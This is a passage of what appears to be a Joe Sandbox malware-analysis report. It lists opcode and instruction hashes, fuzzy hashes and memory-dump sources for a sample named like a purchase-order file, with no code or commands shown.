                                                          • Opcode ID: 4d50705882a50cc983f16a303f440f8c1e0d5fb2565476520cf3f5f8ffff3f5d
                                                          • Instruction ID: 7e96979555b98933927d14e6c6782aa649436a3752f25ec07ef0d18fb3967aff
                                                          • Opcode Fuzzy Hash: 4d50705882a50cc983f16a303f440f8c1e0d5fb2565476520cf3f5f8ffff3f5d
                                                          • Instruction Fuzzy Hash: 7CE0C234A09108EBC704DFA8D544AACBBB8EB45311F10C89DD80823341CB32AE42CB81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4b459a1c3c05f17ebf12a94a83d86a19b2b026fb8aa0bbdd4638564bcd1f24dd
                                                          • Instruction ID: d7928f48eaef8b396d4869f773d9eb4486d260855278db7c3cebf79dd909d0b1
                                                          • Opcode Fuzzy Hash: 4b459a1c3c05f17ebf12a94a83d86a19b2b026fb8aa0bbdd4638564bcd1f24dd
                                                          • Instruction Fuzzy Hash: 31F04574D12609CFEB58CF59D945BA9BBF2FF48210F2481A6E409E7254DB746981CF04
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e6d615f40197f28800eab16ba50604cca5da5214d203bba1db10c180eddce36
                                                          • Instruction ID: eeb663e2d4e1421a2709548e159f8c35ae2d0463ea75dc978d49b22b41037142
                                                          • Opcode Fuzzy Hash: 0e6d615f40197f28800eab16ba50604cca5da5214d203bba1db10c180eddce36
                                                          • Instruction Fuzzy Hash: 42E08C3080A208EBC708EFF4D8093AE7B75EB86351F2081E9C81427380CB724A80DB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d4a90397171a6d10f233b4ab39bdba1ef74b12abf93a1d233b5986cb7f8c968e
                                                          • Instruction ID: fd3da438cbe0ca73c43c7ca0c5ca6db284496a6e464583ccf499b0b0b1b95bfd
                                                          • Opcode Fuzzy Hash: d4a90397171a6d10f233b4ab39bdba1ef74b12abf93a1d233b5986cb7f8c968e
                                                          • Instruction Fuzzy Hash: 91E01271A24248DFE70CDF54E098BAD7BB2FB453B4F144055E841A7255CFB4B885CB41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 905f59fbe0183a2a68c6f0f21054cd90d4b7f888f88aec01e8fde783b64b8b70
                                                          • Instruction ID: 72fee15f42a7405ce2d8976b47d41c589d2beb267cda4b1e041c640bc8a484f2
                                                          • Opcode Fuzzy Hash: 905f59fbe0183a2a68c6f0f21054cd90d4b7f888f88aec01e8fde783b64b8b70
                                                          • Instruction Fuzzy Hash: B8E0EC70D96208DFC744EFB8D5457ADBFF4EB08211F6081A9D80993340EAB16A50CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5035f2ac86302883fba71d4fe6f0e21043e6c95cc06ad6bd0b0b65bd4dc1433b
                                                          • Instruction ID: aded8b81a5d5cda0d0e6325efaf1617fd6cf031e85d6bf0f9236a3f566d05e9c
                                                          • Opcode Fuzzy Hash: 5035f2ac86302883fba71d4fe6f0e21043e6c95cc06ad6bd0b0b65bd4dc1433b
                                                          • Instruction Fuzzy Hash: 57E08C34909108EBC704DFA8E5409ACFBB8EB46304F109099D84813341CA32AE42CF80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5035f2ac86302883fba71d4fe6f0e21043e6c95cc06ad6bd0b0b65bd4dc1433b
                                                          • Instruction ID: 72bccea964ba495270438ab73baf04c804d1a82260edf1dab4ee29560753a05e
                                                          • Opcode Fuzzy Hash: 5035f2ac86302883fba71d4fe6f0e21043e6c95cc06ad6bd0b0b65bd4dc1433b
                                                          • Instruction Fuzzy Hash: 89E0C234909208DBCB04DFA8EA429ACBBB9EB49304F10D0ADCC0913341CB32AE42DF80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 964572846846b3818459085e5b2ab2dbbbfcf35d1d68de11006d576f94e670e0
                                                          • Instruction ID: 165d91eaf25ca168bf062fbfcb648aa5464732941e1b5db64c783da2f691e0ff
                                                          • Opcode Fuzzy Hash: 964572846846b3818459085e5b2ab2dbbbfcf35d1d68de11006d576f94e670e0
                                                          • Instruction Fuzzy Hash: 4EE0C77180210CABC700FBF8C405AAE7BB8EB08200F0044E6D40993100EEB6AA00EBA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e7c9d26f929f9b88d6a35cd088979c5004271ac570f132b0a10e09170d28f9d7
                                                          • Instruction ID: 9b0b417229e3db1e62088a13be584f97f70bfd6a87361a6869fec592bcfcfcee
                                                          • Opcode Fuzzy Hash: e7c9d26f929f9b88d6a35cd088979c5004271ac570f132b0a10e09170d28f9d7
                                                          • Instruction Fuzzy Hash: A7E08C70C49208EFCB40EFB8E5446ACBBB5EB08210F1054AA9808A3200EB705A80DF95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b9669dbebd8e42b39624e680fff368209d2974f3f337b06f9642d8bdd1eef1fd
                                                          • Instruction ID: 2e8e34b13f5ae8332e4bb5397f47b609be25306df9aaab95940983b88fdd2a79
                                                          • Opcode Fuzzy Hash: b9669dbebd8e42b39624e680fff368209d2974f3f337b06f9642d8bdd1eef1fd
                                                          • Instruction Fuzzy Hash: 10E0127190110CEBD701EFF5D5086AE7BB9EB49301F4045E6D50993111EEB59E10EBF6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a2da4a14ceeee2f7c42630c1e163dcfaf440e37522c70994f73be69bebe17c4a
                                                          • Instruction ID: 16410b80682a837bbf85378fd37541bd3d9c19da3eba712647db3f54768ab287
                                                          • Opcode Fuzzy Hash: a2da4a14ceeee2f7c42630c1e163dcfaf440e37522c70994f73be69bebe17c4a
                                                          • Instruction Fuzzy Hash: 3DE0C97494425DCFDB64CF58D485A9D7FB2EB49300F1180A9D08AA7704DB709D85DB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 31eafa501551b7e1d1aef62846d52ec6acda0077ce28d1c8119e39e21e09354f
                                                          • Instruction ID: 363670a71e83e7b9a6adb83d7d8beaf0d655d29c0a38a905f54ac9679df07e73
                                                          • Opcode Fuzzy Hash: 31eafa501551b7e1d1aef62846d52ec6acda0077ce28d1c8119e39e21e09354f
                                                          • Instruction Fuzzy Hash: BCE01270D05208DFC741EFBCD5896ADBFF8EB08211F1044A9D80993350EB705E80CB95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7cf767db632b12d2c6e4448fb5ac757bda98e6bb087679fa960e6338984cc004
                                                          • Instruction ID: ed7daf97f478d51586024eccbf82ceb9aa81578b9f6facf63de68a8bc7f23109
                                                          • Opcode Fuzzy Hash: 7cf767db632b12d2c6e4448fb5ac757bda98e6bb087679fa960e6338984cc004
                                                          • Instruction Fuzzy Hash: D6F0FA749146288FCB66DF25D845799BBF9FB48201F10A0EAE80DA3250EBB42F858F50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26ee4cc4873a4ec298db30fd235851ea8f1fc006e1db14b22752e287d0399981
                                                          • Instruction ID: 6b799751cd6ad49547c6a58fe93dbb0f143b1164f27342911760d49789c02fc6
                                                          • Opcode Fuzzy Hash: 26ee4cc4873a4ec298db30fd235851ea8f1fc006e1db14b22752e287d0399981
                                                          • Instruction Fuzzy Hash: FCE01271E41308EBCB08DFB4D95276E77F6EB84210F5095A8F808AB240EE756F00AB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b3ea031adb62438790dd7dc80d7d49efd7ef0f502704cbd13821745fe01d88a8
                                                          • Instruction ID: eb7dc551eb17749cecf8930fa570c1b4f72b8e14618f00a2207278f2618a4581
                                                          • Opcode Fuzzy Hash: b3ea031adb62438790dd7dc80d7d49efd7ef0f502704cbd13821745fe01d88a8
                                                          • Instruction Fuzzy Hash: 19E0C23480A208DFCB40DBA8C5456BCBFB4EB09310F1080DACC4853342EA729E41CB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f1e4101259f69d7246275fa67f2ca856a7019a9fa399176a4cac89613c9c7f5
                                                          • Instruction ID: f4fdebf1698608b4becd249bd3d2ce88ed9e2e24e4566bd464f601745e62c03f
                                                          • Opcode Fuzzy Hash: 4f1e4101259f69d7246275fa67f2ca856a7019a9fa399176a4cac89613c9c7f5
                                                          • Instruction Fuzzy Hash: 48E01A34904204CFEB658F28E880365B371FB41321FA48AA9E489A6664CB79DDC5DF24
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8dc9554f3ddf9a093f0ab2dc83d0b5cf75cfe9f0e845ea876bf1f1659c3fa802
                                                          • Instruction ID: 09fae5b0bfc4679fb4360a2c96f8226835c8dbdf930a4406985571b88f18d233
                                                          • Opcode Fuzzy Hash: 8dc9554f3ddf9a093f0ab2dc83d0b5cf75cfe9f0e845ea876bf1f1659c3fa802
                                                          • Instruction Fuzzy Hash: 75E06578A00208CBDF04DFA4E8847AC73B0FB85301F208528E008A7265CB78A982CB24
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0fbc0711ef9d3b8128c62036608f72a03fb221282242e1b2e12b44c025bd2cff
                                                          • Instruction ID: 79485984969cf6e77468beadde8bdcf2e3866a6a817eb9e6c426f6e5d65ad5df
                                                          • Opcode Fuzzy Hash: 0fbc0711ef9d3b8128c62036608f72a03fb221282242e1b2e12b44c025bd2cff
                                                          • Instruction Fuzzy Hash: 96D05E34509108DBC704DA98D541A6DBBACEB86214F1084DE980957341CA729E02CB92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0fbc0711ef9d3b8128c62036608f72a03fb221282242e1b2e12b44c025bd2cff
                                                          • Instruction ID: 320db25866ebacaaf744ed3c91fa9f4e466b3406976e74858298f6b9c3fa8606
                                                          • Opcode Fuzzy Hash: 0fbc0711ef9d3b8128c62036608f72a03fb221282242e1b2e12b44c025bd2cff
                                                          • Instruction Fuzzy Hash: DED0A730509108EBC744DB99D551A79BBFDEB46318F5084DDD80967351CB739D01CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6006cbf9daf3204142d02bb6fc0f350f0cf89c2883b8aa30096a02a26c16975
                                                          • Instruction ID: 58c67103cb7d9b9a7ca783e4e418e8437f7484977fe6ec6e37d70b37f8c59d62
                                                          • Opcode Fuzzy Hash: f6006cbf9daf3204142d02bb6fc0f350f0cf89c2883b8aa30096a02a26c16975
                                                          • Instruction Fuzzy Hash: 0CE0EC71A01108ABCB04DBA8D55169DBBF5EB44200F108599E808A7341EA756E009791
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef72dc7fd78165fa3aa53ec2b84db11a3e1130112f292c822d184796e4dbacfc
                                                          • Instruction ID: e390cfd109fbf3d289e9cae5cb6381cfb74d789734e1bdda68094c96b149e51e
                                                          • Opcode Fuzzy Hash: ef72dc7fd78165fa3aa53ec2b84db11a3e1130112f292c822d184796e4dbacfc
                                                          • Instruction Fuzzy Hash: 52F04574906218CFEB54CF28ED69B9CBBB1FB08351F1002D6E509A3241DB745D80CF54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86fdf8b765124653c8bcef1681e1cbea18fd3d8405bdb74a4a8d4f2d5ad24dd9
                                                          • Instruction ID: a50b570437793f3d42ac6c0818a63075c856c9c7e01e7651cfe5a3acdda0b1ca
                                                          • Opcode Fuzzy Hash: 86fdf8b765124653c8bcef1681e1cbea18fd3d8405bdb74a4a8d4f2d5ad24dd9
                                                          • Instruction Fuzzy Hash: 90E04F30A10218CFDB18EFA4D8997ADBBB2EB88300F00C0DAD58973384CA342E44CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 59a10618f52dde262993805cb3a6cd4fcc9361a990009969d436baf23e850f8b
                                                          • Instruction ID: 63f1354451c3df600616746a8894bf860e323c0bbc8c98b3a5dd25754c4c5b1b
                                                          • Opcode Fuzzy Hash: 59a10618f52dde262993805cb3a6cd4fcc9361a990009969d436baf23e850f8b
                                                          • Instruction Fuzzy Hash: 7BE0E531A01115CBD7A8DB24D8947ADBBB1EB89714F10C1A9E899A3284DE342DC99F41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81e5f1359ae3ec93eabc9ffdadd0cc9deaa3af2299cc8ba4da148a29290bb3a5
                                                          • Instruction ID: a12826698501a584c5a3d61e80f003210c89a116433250c809109051391dd5ba
                                                          • Opcode Fuzzy Hash: 81e5f1359ae3ec93eabc9ffdadd0cc9deaa3af2299cc8ba4da148a29290bb3a5
                                                          • Instruction Fuzzy Hash: BAE01A31A5021DCBEB28DF24E899BAD7B76EB84315F1080E9E40D63294DE346D80DF61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 845e9ce36c8b0b1db117efd077c1c65e74e8e3a590f8cd65c59df2d2a273c391
                                                          • Instruction ID: 51069843c1f301debba8bcc5ab47805eae68ef8771199e0192e8008b860c84f0
                                                          • Opcode Fuzzy Hash: 845e9ce36c8b0b1db117efd077c1c65e74e8e3a590f8cd65c59df2d2a273c391
                                                          • Instruction Fuzzy Hash: 5DE01A31A00158CBD728DF64D8997DDBB71EB89304F50C0DAE54A73284CA346E80CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0b9c88a7fa51d9cf5462b3f90f6cda1535e8791d469e59fc2996befddcaa6392
                                                          • Instruction ID: 2dd6951c5f8bca77b9d161da4a60548d66adde25b81cdefecd15fb9b0bb4a98a
                                                          • Opcode Fuzzy Hash: 0b9c88a7fa51d9cf5462b3f90f6cda1535e8791d469e59fc2996befddcaa6392
                                                          • Instruction Fuzzy Hash: 8BE0E530A151188BD758DB24C8993ED7AB2EB89310F1080D9D48E63385CE742EC9CF40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2fa7524ad29b3453c7fb1b6f78fdeac250a74391868dbffacf96d3c46cb441fb
                                                          • Instruction ID: 829290f7d97b6dbbbaae819d98a7447eda4f8825fa8b7a8e0e48a80b2b48133e
                                                          • Opcode Fuzzy Hash: 2fa7524ad29b3453c7fb1b6f78fdeac250a74391868dbffacf96d3c46cb441fb
                                                          • Instruction Fuzzy Hash: B3E0ED71900658CBDB54DB24D898799BBB2EB84341F60C0D9A44967384CF342D84CF52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b8f8c6e854188444690ee0af9879ce00cff580aa3072da9e58838dfdaad32d3b
                                                          • Instruction ID: d00c4cf4741941837bdead4f43b9a776ec4cd0bb41d1f2ea656e102d9eff3498
                                                          • Opcode Fuzzy Hash: b8f8c6e854188444690ee0af9879ce00cff580aa3072da9e58838dfdaad32d3b
                                                          • Instruction Fuzzy Hash: 32D01270A00208EBCB44EFADD94155DB7B5DB45200B1085A89409D3311DE311F00AB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d9a8e7116a7b146b549d91d1c8c2b72a795b4559a92b6f5c0d67cc1fa758c448
                                                          • Instruction ID: af6423d1bbcb856fb3eea85337dafa66e256de476c7f4f9138f413d777f7045c
                                                          • Opcode Fuzzy Hash: d9a8e7116a7b146b549d91d1c8c2b72a795b4559a92b6f5c0d67cc1fa758c448
                                                          • Instruction Fuzzy Hash: A5D01734E4411CDBEB24DBB4E4887DCBBB1FB84215F1000AAD109A3241CB740995CF10
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 04f335df0bcd55808cb6ab2b64e64fedc3f16636f4d7c50ea409527716fe44b6
                                                          • Instruction ID: a4a6351b94c3101e39300b0400ef32f1010481ccbada0bcb7e66627e532970c3
                                                          • Opcode Fuzzy Hash: 04f335df0bcd55808cb6ab2b64e64fedc3f16636f4d7c50ea409527716fe44b6
                                                          • Instruction Fuzzy Hash: 6BE0C270A04248CFE704DF68C8487DA7BB1EFC8300F04C098D04CA7304CB7049848F91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6b2dd0199dc4da7930eb4d52a0375e6c9cf9a705eddf657525d2bd8c75a3c9e6
                                                          • Instruction ID: bc1bf4716f5069b8c391fb52efd420389f052a34eac1fd977eb25ad0a93fc180
                                                          • Opcode Fuzzy Hash: 6b2dd0199dc4da7930eb4d52a0375e6c9cf9a705eddf657525d2bd8c75a3c9e6
                                                          • Instruction Fuzzy Hash: 44D05EB0A0439C8FCB1CFF24D8887593BB2FB40340F109A99E40963344CB741D868F42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eeca8324badd8d190f6faf0a5c9c198357a0aab1b3854894b0bfe97566d245bc
                                                          • Instruction ID: cdfb696e26efde97b5483e97616bec827db6d1a9a7be43e0d12daafc077513ec
                                                          • Opcode Fuzzy Hash: eeca8324badd8d190f6faf0a5c9c198357a0aab1b3854894b0bfe97566d245bc
                                                          • Instruction Fuzzy Hash: 42C02B3104F60883C6206799980C77573DCD70F321F005C02DE0D834230FF0B480CA94
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3df2d421de393b91c2232d42043b25936b09338959b8de2872c31e2fe4b45bc6
                                                          • Instruction ID: 6134c361841a288001d359cf235652726c5af4ee2bb5ed578fd73cdde5c046cd
                                                          • Opcode Fuzzy Hash: 3df2d421de393b91c2232d42043b25936b09338959b8de2872c31e2fe4b45bc6
                                                          • Instruction Fuzzy Hash: FFD01236000104EFD700EFE4D844A597B34EF98330B068091E5245B371CB31CC12CE91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf2bdd8601c74f76081c2a28a9596e2a72d27e82dcfc6ef92c770297e9367187
